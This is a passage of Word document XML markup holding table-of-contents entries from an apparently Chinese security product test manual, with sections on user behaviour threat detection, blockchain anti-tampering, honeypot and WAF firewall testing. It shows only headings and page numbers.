              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>12.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>用户行为分析威胁检测功能测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630319 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DAA7B2D" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630320" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>12.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>功能介绍</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630320 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30442924" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630321" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>12.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>用户行为分析引擎启动</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630321 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41EB21F8" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630322" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>12.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试步骤</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630322 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74830367" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630323" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>13.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>区块链防篡改测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630323 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61267E3A" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630324" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>13.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>客户端测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630324 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>44</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1CC561FF" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630325" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>13.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>区块链存证测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630325 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B4D2ED4" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630326" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>13.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>区块链防篡改测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630326 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B0A67E3" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630327" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>13.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>区块链代码仓库</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630327 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>58</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19404662" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630328" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>14.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>蜜罐测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630328 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>65</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51D8EC0D" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630329" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>14.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>功能介绍</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630329 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>65</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09E48F62" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8302"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630330" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>14.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>测试步骤</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630330 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>65</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="205D6238" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:spacing w:before="312"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc36630331" w:history="1">
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
            <w14:scene3d>
              <w14:camera w14:prst="orthographicFront"/>
              <w14:lightRig w14:rig="threePt" w14:dir="t">
                <w14:rot w14:lat="0" w14:lon="0" w14:rev="0"/>
              </w14:lightRig>
            </w14:scene3d>
          </w:rPr>
          <w:t>15.</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> WAF</w:t>
        </w:r>
        <w:r w:rsidRPr="009B34A2">
          <w:rPr>
            <w:rStyle w:val="af3"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>防火墙测试</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc36630331 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>74</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="398DB9FD" w14:textId="77777777" w:rsidR="00A25348" w:rsidRDefault="00A25348">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:tabs>
